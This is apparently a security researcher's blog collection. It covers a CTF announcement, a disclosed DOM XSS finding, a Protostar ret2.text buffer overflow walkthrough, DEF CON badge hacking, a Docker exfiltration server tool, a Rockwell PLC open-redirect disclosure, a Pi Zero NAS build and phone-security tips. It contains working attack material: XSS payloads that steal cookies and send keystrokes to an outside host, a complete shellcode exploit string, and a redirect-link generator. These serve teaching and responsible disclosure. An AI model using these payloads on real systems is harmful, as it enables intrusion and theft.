2020 Quarantine CTF

In honor of social distancing, I will be hosting a remote quarantine CTF Thursday, April 2nd, 2020 from 6:00-9:00 PST. The CTF is completely free and presents five different web application security challenges. You can easily register here to secure your spot!

Details

Any way that you can find the flag is valid in my book. That being said, I do have a few requests:

  • Brute forcing passwords is not the intended route for any of the boxes.
  • CTFD is the framework that’s being used to host the CTF so there is a scoreboard, flag submission, etc.
  • Fuzzing is definitely in scope, but please be mindful of how many requests are being sent every second. I’m not sure how much CTFD’s infrastructure can handle.
  • If you find an unintentional bug (I’m sure there are plenty), kudos! I would love to hear about it once I post the solutions/containers after the CTF has ended.
  • Overall, I would consider the CTF to be focused on beginner-level web exploitation techniques. There are however some slightly harder challenges.
  • The objective of the CTF is to have fun and give everyone constructive things to do while we are all stuck at home.

Zero-Day Research: Mechanical Keyboard Finder Version 4.31

Introduction

In this edition of Zero-Day Research, I happen to come across a DOM-based Cross Site Scripting Vulnerability in ‘Mechanical Keyboard’s (MK’s) Famous Mechanical Keyboard Finder (Version 4.31)’ and helped their team verify the issue upon request. I have to give lots of kudos to the awesome security team at MK. They quickly responded and patched the issue within a day of disclosure. If more vendors were as serious as MK about security, our nation’s overall cyber posture would be in much better shape. MK is an industry-leading mechanical keyboard vendor with unique varieties of mechanical keyboards for sale. You can check them out here.

Disclosure and Disclaimer

The Cross Site Scripting vulnerability was responsibly disclosed and verified (upon request) to the MK security team. This post was intended for web developers who are interested in keeping their applications secure and is for EDUCATIONAL PURPOSES ONLY. I do not condone illegal activity and cannot be held responsible for the misuse of this information.

Cross Site Scripting

Cross-Site Scripting (XSS) is a common web vulnerability that allows an attacker to inject malicious javascript into normal websites. XSS is a client-side attack, where the end-user connecting to the application is the victim. This enables attackers to steal credentials, hijack accounts, access sensitive data, and much more. For more information on cross-site scripting, PortSwigger has fantastic in-depth articlesexplaining the different types of XSS and how they can impact end-users.

DOM Based XSS

OWASP refers to DOM Based XSS as “an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment”. The DOM in this context is the “Document Object Model”, or the tree structure and programming interface that is used to construct HTML web pages:

DOMexample

DOM-based XSS can be more difficult to discover than other forms of XSS because it requires a detailed review of how and where the user input is stored within the DOM. Context is the most important aspect when searching for DOM XSS because the location where user input is stored will almost certainly be different in each scenario and application.

Identifying the Vulnerability

The overall process for identifying DOM XSS bugs is simple:

  1. See if the application stores user input somewhere in the DOM
  2. See if the application filters certain characters or sanitizes the input. If the application sanitizes user input using techniques like HTML or javascript encoding, DOM XSS might not exist in the application.
  3. If the application stores user input without sanitization, you can guarantee some extent of XSS is possible. Even with a Web Application Firewall (WAF) in play, there is an infinite amount of XSS filter bypasses that can be applied to the payload. Only upon request with full permission from the vendor should you every POC (or verify) the vulnerability on a live application. Given that we have permission to verify, we can then start crafting an attack based on where the input is stored in the DOM.

Let’s start with a basic request like so:

xss

We can then search for our unique ‘xss’ term in the DOM after the request has been made:

  • In Firefox (or any browser), right-click on the results page and select ‘View Page Source’:
  • On the HTML source page, select Control/Command+f the find a term
source

After verifying the location and presence of our search term in the DOM we can add a few special characters to the end of the term like so:

xss>"'

Repeating the previous few steps we can verify if our new search term is stored in the DOM without being converted to an HTML entity. A basic list of basic HTML entities is shown below:

entities

In this particular situation, the special characters were not converted to HTML entities. That being said, we can close off the encompassing attribute or tag as a part of our search term and effectively add our code to the DOM.

Payload Crafting

In this context we want to craft a payload that closes off the preceding h3 tag, continues to execute some code, and adds a trailing h3 tag to achieve a correct number of matching tags:

Sample payload:
</h3><img src=x onerror=prompt(document.domain)><h3>

This will cleanly close off the encompassing h3 tag and allow us to execute code that will pop up an alert to the screen with the name of the vulnerable domain:

alert

It worked! 

Note: in scenarios where the application does some form of basic input sanitization searching for bad characters we could url encode our payload like so:

Sample payload encoded:
%3C%2Fh3%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E%3Ch3%3E

Taking it Further

This XSS bug not only modifies the DOM but is reflected in the URL. This means we could carry out the XSS attack by providing a simple link in a phishing campaign. Collecting user cookies at this point is trivial:

</h3><img src=x onerror=prompt(document.cookie)><h3>
cookies

Keylogging and shipping the data off to a remote server is also quite simple:

</h3><img src=x onerror=prompt'document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'><h3>

From here the possibilities are endless. There are quite a few XSS payloads on the web. Some possible attack scenarios include:

  • Account Hijacking
  • Port Scanning
  • Spying/Keylogging
  • Browser Hooking with BeEF
  • Installing Backdoors/Malware

Mitigation

DOM XSS can be hard for automated scanners to find at times because of its dynamic nature. This type of bug is quite common across the Internet but can be prevented by treating all user input as malicious and sanitizing the data in question.

PHP (the language used by this site) offers useful functions to achieve sanitization, such as htmlspecialchars() and htmlentities(). These functions will automatically convert special characters to HTML entities. Most languages offer these types of libraries and functions to make sanitizing user input quite easy. One mistake developers make is attempting to implement filtering and sanitization using client-side controls. Each user has complete control over the client, rendering client-side sanitization efforts useless.

References



Proverbs 2:6-8
For the Lord gives wisdom; from his mouth come knowledge and understanding…

Return to .Text

Prerequisites

In this article, we are going to quickly discuss a ROP technique called ‘return to .text’ (ret2.text). Before you proceed to learn about this slightly more advanced topic, I recommend becoming extremely familiar with the following prerequisites before moving on:

  • Exploiting Basic Buffer Overflows
  • Return Oriented Programming (ROP)
  • Return to LIBC
  • Python
  • Basic C Programming
  • Assembly
  • GNU Debugger (GDB)

Spotting the Vulnerability

The ret2.text technque is almost identical to the return to libc (ret2libc) technique, but can be utilized in scenarios where libc can’t be called directly from the stack. To demonstrate this, we will be going through Exploit educations’s Protostar Stack 7 challenge. For more information on how to download/setup the Protostar VM, reference the Protostar documentation. Let’s start by viewing the source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
 char buffer[64];
 unsigned int ret;

 printf("input path please: "); fflush(stdout);

 gets(buffer);

 ret = __builtin_return_address(0);

 if((ret & 0xb0000000) == 0xb0000000) {
 printf("bzzzt (%p)", ret);
 _exit(1);
 }

 printf("got path %s", buffer);
 return strdup(buffer);
}

int main(int argc, char **argv)
{

 getpath();

}

From viewing the code you can easily spot out where the vulnerability is:

 gets(buffer);

The gets command will read the user’s input into ‘buffer’ without verifying the input length, allowing the user to send an input longer than 64 characters and overwrite data on the stack. However, a basic buffer overflow or ret2libc exploit will not work in this scenario as a result of the address filtering executed by the program, with libc being located at 0xb7e97000 and the stack located around 0xbffffb8c on this particular system:

 if((ret & 0xb0000000) == 0xb0000000) {
 printf("bzzzt (%p)", ret);
 _exit(1);
 }

This is where we can utilize ret2.text to gain code execution. We might not be able to jump to libc or the stack directly, but we can jump to the .text section of the binary where we might find a ‘pop,pop,return’ gadget. We can then place the address of our shellcode on the stack so the ‘return’ portion in ‘pop,pop,return’ jumps to our shellcode. The overall exploit format will look like the following:

Initial_buffer + pop_pop_ret_address + pop_pop_junk + nopsled_addr + nopsled_with_shellcode

  • Initial_buffer- Buffer of random data used to overwrite the stack
  • pop_pop_ret_address- The address of our ‘pop,pop,ret’ gadget in the .text section. This will overwrite the EIP
  • pop_pop_junk- 8 bytes of junk that will be popped off the stack before returning
  • nopsled_addr- The address of our nop sled on the stack
  • nopsled_with_shellcode- The actual nop sled and shellcode to be executed

What we need to find:

  • The address of a ‘Pop, Pop, Return’ gadget in the .text section
  • The position in the initial buffer where the EIP is overwritten
  • Nopsled Address on the stack (or libc if DEP is enabled)

Replicating the crash and finding EIP offset

To replicate the crash I ran the following command in bash:

x=20; while true; do head -c $x /dev/zero | tr '\0' 'A' | ./stack6; if (($? == 139)); then break; fi; sleep 2; x=$((x+20)); echo $x; done
replicate

From here we can see that the crash happened somewhere between 80 and 100 bytes. Just to be safe we will generate a unique string 100 bytes long with msf-pattern_create:

patternCreate

By running the program again with the unique string we can verify the location of the EIP with msf-pattern_offset:

findEIP
patternOffset

Finding a ‘POP, POP, Return’ Gadget

Once you transfer the stack7 binary over to your machine you can utilize msfelfscan (for example) to find a couple of ‘pop, pop, return’ gadgets for us. If you don’t have msfelfscan you can use Ropper to search for the gadgets. In addition, you can always verify which gadgets are actually in the .text section of the binary with Ghidra, objdump, IDA, etc, but fortunately for us, all of the gadgets msfelfscan provides are in the .text section. In this walkthrough, we will use the second address (0x08048492) msfelfscan provides us:

msfelfscan

Finding our Shellcode and a Note About Data Execution Prevention (DEP)

The final step in this exploit is to find where our shellcode and NOP sled will reside on the stack. Fortunately for us, this binary doesn’t have DEP enabled. If DEP was enabled, however, we could simply jump to libc here instead of our shellcode directly and achieve the same results. To keep it simple let’s use GDB to find where our shellcode lands on the stack:

findShellcode

From the image, you can see the giant buffer of “\x41” bytes (“A” in ASCII), which is where we want to jump to. To play it safe, we will jump to the middle of this buffer at 0xbffffcdc.

Putting it all together

Going back to our initial overview of the exploit, let’s plug in the necessary information

  • Initial_buffer- 80 “A” characters
  • pop_pop_ret_address- 0x08048492
  • pop_pop_junk- “BBBBCCCC” (This is just junk top be popped off)
  • nopsled_addr- 0xbffffcdc
  • nopsled_with_shellcode- any x86 /bin/sh shellcode will work here. You can find lots of shellcode on Shell Storm

Conceptually, the overall exploit should resemble the following:

"A"*80 + 0x08048492 + "BBBBCCCC" + 0xbffffcdc + "NOP"*80 + Shellcode

Using this information we can send our exploit string to a file using the following command in python. Remember that the addresses are in little endian format. You can learn more about endianess here:

python -c'print "A"*80+"\x92\x84\x04\x08"+"BBBBCCCC"+"\xdc\xfc\xff\xbf"+"\x90"*80+"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"' > /tmp/test

Testing the Exploit in GDB

From here we can fire off our exploit in GDB to see if everything worked correctly:

testingExploit

It worked!! To run the exploit in GDB you can issue the following commands:

gdb /opt/protostar/bin/stack7

(gdb) r < /tmp/test

Conclusion

If you have experience using the ret2libc technique, ret2.text should be pretty easy to pull off. At the end of the day, it’s another technique in the toolbag you can use in your Capture the Flag and binary exploitation adventures.

The heart of the discerning acquires knowledge, for the ears of the wise seek it out. -Proverbs 18:15

Defcon 27: Hacking the Badge

What did we do?

We made modifications to the DEFCON27 Badge and turned it into a ‘Jackp0t’ badge that will complete other attendee’s badge challenge/trigger rick roll when held within a few inches of each other.

Click the image below to watch the video.

Contributors:

  • Josiah Bryan
  • Geancarlo Palavicini Jr
  • Nick Engmann

The Challenge

This year’s DEFCON Badge challenge involved social interactions with an RF Badge. A regular attendee is challenged to find and touch badges with 10 different badge types (including Sponsors, Vendors, Goons, and even Press). This becomes super challenging when you have to find one of the 20 individuals out of a 30,000 person conference with a Black “UBER” badge (an exciting but non-trivial task). It was much easier for us to figure out how to flash the DEFCON27 badge to do three things:

  1. Automatically complete the “touch 10 different badge types” challenge
  2. Easily help our fellow attendees by unlocking their badges with one that can act as a chameleon, emulating all other badge types.
  3. Profit ???

That’s what the Jackp0t badge does. It automatically puts you in a “COMPLETE” (or win) state on boot and emulates all the different badge types to complete other attendee’s badges in a matter of seconds.

Check out our demo video

How Did you Become a Village?

Quality Rick Roll

Required Hardware

Required Software

  • nxp MCUXpresso IDE 10.2.1
    • an IDE developed by NXP to use with the LPC-Link2. If you are flashing using the Black Magic Probe you won’t need this.
  • FRDM-KL27Z SDK 2.4.1
    • the SDK for interacting with the MKL27Z64VDA4 microcontroller with the MCUXpresso IDE.
  • GDB
    • Powerful GNU Project Debugger. Used to interact with the Black Magic Probe to flash images

Flashing

In order to debug or flash your device, you’ll need one of the many ARM programmers available. We’ve confirmed two different ways to flash. One using the LPC-Link2 + Tag-Connect Cable and one using a Black Magic Probe + Tag-Connect Cable. Depending on your available hardware/software please reference the appropriate section.

LPC-Link2 Setup

  • Install the MCUXpresso IDE on a Windows Machine.
  • Install the SDK by dragging and dropping the SDK Zip file into the MCUXpresso IDE
  • Clone the Jackp0t repo.
$ git clone https://github.com/NickEngmann/Jackp0t.git
  • Copy/Import the Jackp0t/dc27_badge folder into the MCUXpresso IDE.
  • Plug the Tag-Connect Cable into the LPC-Link2.
  • Attach the Tag-Connect Cable to the DEFCON27 Badge.
  • Click on the Flash Button to Flash the Board.

Black Magic Probe Setup

  • Download the jackp0t.bin binary
  • Install GDB
  • Plug in the Black Magic Probe into your computer via USB.
  • Update the firmware on the Black Magic Probe.We initially ran into a lot of issues with the default firmware on the Black Magic Probe. If you update the firmware using the master branch of the wiki, flashing the device was becomes far more consistent. Check out Ross’ instructions on how to upgrade the firmware on the Black Magic Probe:To update your black magic probe, clone the firmware repo from Github build it with make and then perform a DFU update on your probe with the following command:
    • sudo dfu-util -d 1d50:6018,:6017 -s 0x08002000:leave -D src/blackmagic.bin — Ross Schlaiker
  • Open up the arm toolchain.$ arm-none-eabi-gdb
  • Connect to the Black Magic Probe Device via GDB.
    • $ (gdb) target extended-remote <device> On OSX is /dev/cu.usbmodem <some ##>On Linux is /dev/ttyUSB0
  • Touch the Black Magic Probe + Tag-Connect to the SWD pins on the badge. 
  • Use the monitor swdp scan command to connect to the device using the Serial-Wire Debug Protocol.
    • $ (gdb) monitor swdp scan Output: Target voltage: 1.8V Available Targets: No. Att Driver 1 KL27x64 M0+ 2 Kinetis Recovery (MDM-AP)
    • If your scan doesn’t return KL27x64 M0+, and instead returns ‘Generic Cortex-M’, close GDB and retry. This seems to be a race condition of some sort. — Ross Schlaiker
  • Attach to the KL27 Microcontroller.
    • $ (gdb) attach 1
  • Allow GDB to allow access to memory outside of the device’s known memory map. This is useful to allow access to memory mapped IO from GDB.
    • $ (gdb) set mem inaccessible-by-default off
  • Set the binary file. Make sure the binary is in the current directory.
    • $ (gdb) file jackp0t.bin
  • Load the binary onto the board.
    • $ (gdb) load

Future Applications

Figuring out how to edit the source code and successfully flash these badges opens the door to tons of different future hacks. Feel free to use these instructions as a jumping point to create complex hacks like turning the badge into a custom clock!

Credits

License

This project is MIT licensed.

Maraud: Dockerized Data Exfiltration

What is it?

A python command line script to quickly bring up/destroy smb/http(s)/sftp/reqdump file server containers using docker. All credit to @rflathers for the idea and for creating the docker containers. He wrote a fantastic article on docker for pentesters here. All code reference in this post can be found here.

Why?

This script was written with pentesting in mind. It enables a pentester to quickly spin up file servers for data transfers/exfiltration on the command line without the overhead of spinning up/running the server on your host operating system. Even if you aren’t a pentester it is still massively convenient if you want to spin up a quick server and host it locally or on the internet. Another great thing about utilizing docker is if you happen to switch machines you can easily pull the containers and be right back where you started.

Requirements

  • Docker
  • The following Docker Images:
    • rflathers/nginxserve
    • rflathers/reqdump
    • rflathers/impacket
    • atmoz/sftp
  • Linux/OSX (Tested on Ubuntu 18.04)
  • Python3

Usage

python3 maraud.py -h
optional arguments:
-h, --help show this help message and exit
-s, --smb Start a SMB Server (rflathers/impacket)
-w, --http Start a Nginx http(s) server (rflathers/nginxserve)
-r, --reqdump Start a Reqdump server to dump http requests
(rflathers/reqdump)
-f, --sftp Start a sftp server (atmoz/sftp)
-k, --kill Kill the docker containers

Starting a Server

You can pull all of the required docker images at once using the following command:

$ docker pull rflathers/nginxserve && docker pull rflathers/reqdump && docker pull rflathers/impacket && docker pull atmoz/sftp

Regardless of which server you start, it will always mount and serve the current working directory. This script also assumes that you are in the docker group and can execute it without sudo. For example, to start a http(s) server run the following:

python3 maraud.py -w

This will start an Nginx server, bind to ports 80/443 on your local machine, and serve the current working directory. According to @rflathers the Nginx container ‘generates a new random key and self-signed certificate in the correct location for Nginx and then starts the server:’.

You can start more than one server at time like so:

python3 maraud.py -w -s -f -r

This will start reqdump, sftp, smb, and http(s) servers in the current directory all at once. (Note, the smb default login is empty and sftp (port 2222) is foo:pass per atmoz/sftp. The reqdump server (port 3000) will write all of the requests it receives to a file named reqdumplogs in the current working directory.)

Killing the Servers

To kill the servers run the following command:

python3 maraud.py -k

Files that were transferred during execution will persist after the container has been destroyed to prevent data loss. You can verify the container(s) status with docker:

$ docker ps

Internet Forwarding

Want to forward your web server to the internet? Use ngrok. According to their page, ngrok ‘Instantly create a public HTTPS URL for a web site running locally on your development machine’. Spinning up a disposable public facing web server has never been simpler. Just run the following command:

python3 maraud.py -w && ngrok http 80

#Press ctrl+c to close ngrok and python3 maraud.py -k to kill the server

This will use use ngrok to serve up your current directory under a random domain name with trusted TLS certificate! Also the basic version of ngrok is free! (@rflathers has a great example with pictures here)

Troubleshooting

  • If you happen to get a ‘HTTP 403 Forbidden’ when spinning up the web server, check the permissions of the folder you are trying to serve. Generally speaking /tmp, /var/tmp, and /dev/shm are good places to make a folder for transferring files.
  • If you want to run the script from anywhere on your machine, move the script to a folder in your $PATH (such as /usr/local/bin). You can also make the script executable and run it without specifying python3 every time:
$ chmod +x maraud.py
#Now just run it
$ maraud.py -h
  • To add yourself to the docker group on Linux run the following:
sudo usermod -aG docker ${USER}

Zero-Day Research: Rockwell Automation MicroLogix 1400 and CompactLogix 5370 Controllers

Background

As technology continues to advance and more devices become networked together, new vulnerabilities will inevitably rise to the surface that security teams will have to deal with. The critical infrastructure sector is no exception to this phenomenon, where common web technologies are being found more frequently in Programmable Logic Controllers (PLCs), a keystone piece of any industrial network. During our SCADA (Supervisory Control and Data Acquisition)/ICS (Industrial Control System) research over the years, we have seen this trend firsthand, which lead us to examine whether the introduction of web technologies would also introduce many of the vulnerabilities that have plagued websites for decades. This post will cover an Open Redirect Zero Day vulnerability we discovered in Rockwell Automation controllers and provide a POC python exploit to help demonstrate our findings.

DISCLAIMER

This post is for education purposes ONLY. Exploiting a live PLC is illegal. We do not condone illegal activity and cannot be held responsible for any misuse of the given information.

AFFECTED PRODUCTS

The following Rockwell Automation products are affected:

  • MicroLogix 1400 Controllers
  • Series A, All Versions
  • Series B, v15.002 and earlier
  • MicroLogix 1100 Controllers v14.00 and earlier
  • CompactLogix 5370 L1 controllers v30.014 and earlier
  • CompactLogix 5370 L2 controllers v30.014 and earlier
  • CompactLogix 5370 L3 controllers (includes CompactLogix GuardLogix controllers) v30.014 and earlier

Open Redirect Vulnerability

An Open Redirect vulnerability occurs when a web application accepts user-supplied input in the URL that contains a link to an external website, and consequently uses that link to redirect the user’s browser, providing a mechanism for attackers to install malicious software on the user’s machine. The Open Redirect vulnerability we discovered in various Rockwell Controllers is no exception to this rule. Each controller runs a web server that displays diagnostics about that specific PLC. There also exists a URL parameter that enables the PLC to redirect the user’s browser like so:

http://192.168.1.12/index.html?redirect=/localpage

The redirect parameter intends to send users to another page located on the PLCs website. Under normal circumstances, the PLC would filter out redirects to an external website, so if you tried the following:

http://192.168.1.12/index.html?redirect=/externalsite

it would filter out the request and prevent the browser from being sent to a malicious site. However, the PLCs redirect filter does not account for the various ways to enter a URL like so:

http://192.168.1.12/index.html?redirect=//MaliciousSite.com

From the browser’s perspective, the second ‘/’ character will be ignored, making it a valid URL yet bypassing the PLCs filter. The browser will then be redirected to the website provided after the second ‘/’. This type of client-side attack can aid in phishing campaigns to setup browser exploits or install malware.

Proof of Concept Exploit

Consider the following scenario:

A user with access to the controller receives an email disguised as the Support Center or Help Desk (Figure Below):

HelpDesk

Upon following the link, you can see the user is prompted to save the executable being served on the external site:

RedirectMalware

This basic example demonstrates how the browser is redirected to an external page, setting up the stage for far more complex browser attacks. This attack could indirectly pose a real threat to the control system if the attacker manages to get direct access to a machine that has access to the controller. The following POC code will generate a redirect link for you to replicate the attack in a controlled environment:

import argparse

parser = argparse.ArgumentParser(description='Callback Script')
parser.add_argument('-r', '--redirect', required=True, dest="redirect", action='store', help='Redirect Destination IP')		
parser.add_argument('-p', '--plc', required=True, dest="plc", action='store', help='Rockwell Controller IP')	
args = parser.parse_args()  #Parse Command Line Arguments

print "Generating link..."
print "http://"+args.plc+"/index.html?redirect=//"+args.redirect

Disclosure

The vulnerabilities were immediately reported to the National Cybersecurity and Communications Integration Center (NCCIC) by security researchers Josiah Bryan and Geancarlo Palavicini. You can find the full advisory here.

Mitigation

Rockwell Automation has released an update for each of the affected devices. Rockwell also recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Update to the latest available firmware revision that addresses the associated risk.
  • Use trusted software, software patches, anti-virus/anti-malware programs, and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

SUBZero: A DIY Pi Zero USB Network-Attached Storage Device

TLDR

Quite often I find myself on the go, in need of storing/sharing files on a local network with others without an accessible internet connection. Even with an internet connection, I find myself wanting to keep most of my file sharing local, to prevent storing sensitive data in the cloud (Infamous Cloud Security Breaches). To fix this problem I created the SUBZero (Secure USB Backup Zero), a DIY Wireless USB NAS (Network Attached Storage) that enables you to securely upload files on the go using a $10 Raspberry Pi Zero W! NAS is a low cost, convenient way to backup files, photos, and data for future use. The SUBZero was not intended to replace traditional USBs but offers features that you wouldn’t typically find on a COTS USB.

Features

  • Wireless NAS
  • Access Point with configurable WPA2 authentication
  • Full TCP/IP on the local SUBZero network
  • Can act as a wireless router, but can also be used completely offline
  • IP Masquerading
  • Removable/replaceable SD card. This allows you to buy either a large or small SD card depending on your own needs.
  • Easy to use HTTPS File Server
  • Built with a $10.00 Raspberry Pi Zero W running Raspbian Stretch Lite. This fares better than a traditional USB in some cases because the SUBZero is also a fully functional computer.
  • Can be run/powered by your phone using a USB to USB-C/Lightning/Micro-USB/etc adapter

How it Works

Just plug in the SUBZero to a USB port and it will broadcast a WiFi network named SUBZero (the default password is raspberry for WiFi, and pi:raspberry for the OS. PLEASE change this once it’s up and running). Once connected to the network, you can browse to https://192.168.1.1 and start uploading/sharing files. This functions as a standalone network, meaning no Internet connection required!.
![SUBZero](/assets/img/posts/HTTPSserver_sm.png) 

What You Need

  • Raspberry Pi Zero W
  • Micro SD card
  • Pi Zero USB Stem (Optional)
  • Soldering Station (Optional)
  • 3D Printer (Optional)

Installation

Flashing the Raspberry Pi Zero W with the SUBZero Image

The easiest way to get up and running with the SUBZero is by grabbing SUBZero image and flashing it onto an SD card. I recommend using Ethcher for flashing the SD card. Etcher is easy to use and works on Windows, OSX, and Linux.

Installing from source

To install the SUBZero on your Raspberry Pi Zero W, clone the SUBZero repository from my GitHub and run the install script.

$ git clone https://github.com/Halcy0nic/SUBZero.git
$ cd ./SUBZero
$ sudo chmod +x install.sh && sudo ./install.sh

During the installation, you will be prompted to enter data for the self-signed certificate. You can simply enter a ‘.’ or dummy data for all of the fields when generating the cert. Once you have installed the SUBZero, reboot the machine and you should see a WiFi Access Point named ‘SUBZero’ that you can connect to. Once connected to the SUBZero wireless network you can browse to https://192.168.1.1 and start uploading files.


NOTE: Your browser might complain about the cert being invalid (because it’s self-signed). Proceed to the webpage anyway and add an exception if necessary.

PI Zero USB Stem

According to Zerostem, the Pi ‘Zero Stem is a PCB shim that turns a Raspberry Pi Zero into a USB dongle. Once the shim is installed, your Raspberry Pi can be plugged directly into a computer or USB hub without any additional cables or power supplies.’ This is much more convenient than using a USB adapter, which would normally be required for a Pi Zero. Installing the Zero Stem will require some soldering experience, however. Once you have a Pi and Zero Stem you can turn it into a USB by soldering the STEM onto the Pi Zero using their instructions.

3D printed case

Lots of thanks go to Nick Engmann for this one. He developed the 3D printed SUBZero Case. Nick actively contributes to the SUBZero project and has some amazing projects of his own on his website, so go check him out!
![SUBZero](/assets/img/posts/subzeroclose_placehold.jpg) 

Routing

By default, the SUBZero is not configured to route any traffic or provide internet access. Configuring the device to route traffic on the network is pretty simple though. I found a tutorial by Phil Martin showing how to do this. First, log in to the SUBZero using the credentials ‘pi:raspberry’ (you should change this) and open /etc/sysctl.conf as sudo with vim/vi/nano. Uncomment the line containing ‘net.ipv4.ip_forward=1’ by removing the # from the beginning of the line, save the changes, and return to the terminal. Assuming you are using wlan0 for your WiFi interface and eth0 for your internet connection, execute the following commands on the terminal:

$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  
$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT  
$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
$ sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"

Lastly open the file /etc/rc.local as sudo and add the following line at the bottom, right above exit 0:

iptables-restore < /etc/iptables.ipv4.nat 

Expanding the Filesystem

By default, the Raspbian root file system is around 2GB. However, if you have an SD card with more capacity it’s a great idea to go ahead and expand your installation to the entire SD card. This way you can have the maximum amount of file storage on your SUBZero device.

To expand to the filesystem boot up the SUBZero device and open up a terminal and execute the following command:

$ sudo raspi-config
raspi_config

You will be presented with a GUI menu, go ahead and go down to “Advanced Options” and hit enter.

raspi_config

Then at the second menu hit enter on “Expand Filesystem”. You will them be prompted to restart your machine after the operation is over.

Conclusion

You can get all the latest updates and SUBZero news on my GitHub. This project is completely open source and free to use in any way you can imagine. You can get more information on HacksterHackaday, and Thingaverse. I love feedback and welcome contributions, so if you have cool SUBZero ideas, let me know!.

Cybersecurity 101: Can you hear me now?

 Imagine a world where everything you ever needed was in a single place. A place where all your friends hang out 24/7, where food, work, shopping, medical care, literature, movies, entertainment, banking, dental care, music, and a repository of endless information all existed in harmony. On top of all that, you only have to make it to your pocket to get there! It all seems too good to be true, and in many cases it is.

Generally speaking, the common thief is pretty lazy. They won’t jump through crazy flaming hoops to get what they want. This certainly holds true for thieves who won’t even leave the comfort of their own home to steal. To the lazy thief, this Utopian place really is a dream come true. Now with a couple keystrokes, all of the collective information about anyone’s life is in a predictable and reachable location. If you haven’t figured it out yet, I’m talking about a cell phone.

Put on your evil hat for a second and bear with me. If I want to get access to my bank account really fast, where would I go? I highly doubt I would drive all the way to the bank just to get a statement. Instead, I would take a look on my phone. If I want to talk to my parents or my best friend, what would I do? Most people wouldn’t drive to their friend’s house just to start up a conversation. Instead, they would call or text them from their phone. It’s kind of scary thinking about how this applies to practically every area of our modern lives. Armed with this information, the path of least resistance to a goldmine of endless life data exists right in your pocket. I don’t think I need to go into any more detail about why it’s important to secure your cell phone, so here are some simple tips explaining how.

Updates

Sometimes it can be annoying to see the little pop-up asking if you would like to update and restart your device. Keeping your device up to date, however, is the simplest way to avoid getting malware and the easiest path to protecting your information. Other benefits of keeping your phone up to date include getting new features, bug fixes, and improved performance. Whether you have an Android device, iPhone, or something different altogether, updates are an essential part of good cyber hygiene.

Fingerprint/Passcode

Adding a passcode to your phone significantly increases the overall security posture of your device. Leaving your device completely unlocked is never a good idea. In most cases using a fingerprint to unlock your device is more advantageous than a passcode as it prevents shoulder surfers who try to look at your code when you type it in. Many applications are also starting to offer fingerprint login to the app itself. For example, here are a couple of popular apps that offer this feature at no cost:

  • Mint
  • Bank of America
  • Google Authenticator
  • Chase
  • Most Password managers like LastPass and Keeper
  • Many hotel and travel apps (e.g. Hilton)

If there is an app that you use quite often, check and see if it supports fingerprint login. You will be surprised at how many apps are starting to accept this trend.

Encryption

There are some conversations you never want to have in a public place where people can listen in on what you’re saying. Conversations work the same way in the cyber realm. Encryption simply takes readable information and makes it unreadable to anyone who is trying to eavesdrop on your conversation. Encrypting your data is a great way to keep your private information truly private. Having nothing to hide is never a good reason to leave your data unprotected. When having nothing to hide is the justification for not using encryption, you inherently assume everyone who’s interested in your data has honorable intentions. Anyone adopting this notion also assumes nobody will take the time to dig into their data and find something of value, such as the golden keys to your identity (SSN). Unfortunately, in the real world, this is simply not the case.

Message Encryption

Encrypting your messages is becoming increasingly vital as we become more dependent on computers for our communication. Encryption prevents spying, eavesdropping, cybercriminals, blackmailing, stalking, and plenty of other issues. Signal private messenger, Whatsapp, and iMessage are a few popular messaging apps that offer great end to end encryption by default to protect all of your conversations.

Phone Encryption

Fortunately for the majority of phone users, both Android and iOS give you the option to encrypt your entire device. On either platform, it only takes the click of a button to protect your data from anyone snooping into your personal business. The process for doing so depends on the phone. Consult Google when looking up how to encrypt your specific device. Here is an example Google search to get you started.

Remote GPS and Remote Wipe

In the unfortunate event your phone is lost or stolen it would be nice to find out where it’s located and remove all the private data on it. That’s where remote GPS and remote wipe comes in. Even though you don’t have physical access to the device, remote GPS allows you to see where your phone is currently at. Remote wipe, on the other hand, allows you to destroy all of the sensitive data on your phone to prevent anyone getting access to it.

You can find out how to turn on the remote wipe feature on Android here or iPhone here. You can also see how to find the location of your device on Android here or iPhone here.

Conclusion

Every choice we make, however small or large, contributes to both our habit and circumstance. C.S. Lewis wrote, “[E]very time you make a choice you are turning the central part of you, the part of you that chooses, into something a little different than it was before”. These tips on improving your cell phone security might seem insignificant but will certainly contribute to your cyber hygiene in a positive way.

Securing Your Social Media

Hello World!

This is the first post on my website and I want to kick things off with something near and dear to everyone’s heart: social media. Social media has ushered in a new era of swift communication where everything and everyone is connected. This lends the question, how can I protect myself and my identity in an increasingly connected world? Can people really use my social media to steal my bank, medical, and other personal information? In short, yes. Cybersecurity has become more complex as new devices like phones, TVs, watches, and even toilets (I’m not kidding check this out) are now being connected to the internet. 

This post requires zero prior cybersecurity knowledge. I’m going to keep this simple and easy to understand, because why complicate things? Here are some simple ways to secure your social media and why they’re important.

Why do I need to care about securing my social media?

